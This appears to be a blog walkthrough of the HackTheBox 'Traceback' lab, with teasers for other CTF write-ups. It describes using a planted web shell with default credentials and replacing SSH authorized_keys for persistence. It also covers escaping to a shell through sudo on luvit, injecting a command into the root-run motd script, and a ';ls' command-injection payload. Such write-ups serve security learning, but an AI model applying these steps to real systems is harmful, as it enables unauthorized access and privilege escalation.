HackTheBox-Traceback Walkthrough

I started with scanning the IP Addr with nmap using the simple command.
Command Used: nmap IP Addr of machine -Pn 

nmap 10.10.10.181 -Pn 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 02:27 IST
Nmap scan report for 10.10.10.181
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http


Now only two things were in my mind and those were what should I enumerate first ssh or http.
SSH can only be bruteforced and this point and bruteforce on the online machine doesn't works or we can say that most online hosted machines are not made to be bruteforced. So, I started 
with HTTP.
I fired up directory burster to find juicy directories if any and mean while I decided to browse the IP Addr since HTTP Service is active and running.

I was presented with the below screen 



dirb was not able to find any directories but the hint was already on the screen presented in front of me.
Hint: This site has been owned , I have left a backdoor.
At this point I thought may be shell is deployed and I need to access that but again dirb was not giving any results.

Investigation of Source code gave me another hint and confirmation of shell deployement.


Hint: Some of the best web shells you might need.
I made the list of top web shells and again started fuzzing , still no luck then at the end I copied the same line mentioned in the page source and googled it.
I got one link of github consisting few web shells.




I again tried fuzzing the website with these shell names and this time I made it.
Command Used: dirb IP Addr /path to file containing web shell names/file.txt
Results: smevk.php was the shell deployed by the owner.
This was presented after opening the following URL: http://10.10.10.181/smevk.php 



I was not having the password to access the web shell so I opened the github link again and investigated the web shell, Username and Password was present “admin:admin”

I logged in to the webshell presented with the following interface


which shows that current user is webadmin
so I decided to move into that user directory in web shell.So, I navigated to /home/webadmin


Then I navigated to /home/webadmin/.ssh 
There was authorized_keys file.
I tried something interesting which was I generated rsa keys on my local machine using ssh-keygen and replaced authorized keys on server with my keys.
Command Used: ssh-keygen in terminal of my local machine. 


Now deleted the server's auth keys and inserted mine.


Now , my public keys are on server and ssh-keygen has generated pair of keys which was pub and private.
now using private key I will try login in ssh using webadmin as username.



Command Used: ssh webadmin@10.10.10.181 -i /root/.ssh/id_rsa (This is the path of private key generated using ssh-keygen)

now I was unable to access the sysadmin, so i read .bash_history and executed the commands as mentioned , also mentioned that sysadmin does not require any password.
Command Used: sudo -l 
Command Used: sudo -u sysadmin /home/sysadmin/luvit
Command Used: os.execute("/bin/bash")



Then navigated to /home/sysadmin and got the user flag 



Again read .bash_history inside sysadmin



So i just ran the same commands in which our input is echoed and after that if we read the 00-header file our input will be echoed  and if we login with ssh again 
Command Used: echo “cat /root/root.txt” >> /etc/update-motd.d/00-header
Command Used: cat /etc/update-motd.d/00-header
Login Again Using SSH: ssh webadmin@10.10.10.181 -i id_rsa 
Root Flag will be presented




Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

CTF - Dina : 1.0.1 walkthrough

Image
     Lab Environment  : Attacker’s Machine :  Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2(2017-11-08) x86_64 GNU/Linux Vulnerable Machine : Dina: 1.0.1 Scanning phase route -n (To know the gateway) i.e 172.16.60.2 arp-scan --local (to know the devices connected to the local network)   Vulnerable machine IP : 172.16.60.154           Using nmap for scanning the IP : nmap -sS -sC -sV  172.16.60.154 We got one open port i.e 80 and http service is active Since the port 80 is open and http service is active then we can open the IP in browser.   Another nmap syntax to know vulnerability if any : nmap --script vuln 172.16.60.154 Now further using dirb for scanning the directories : dirb http://172.16.60.154 Some results are obtained after using dirb .  Opened the http://172.16.60.154/robots.txt and found something interesti
Read more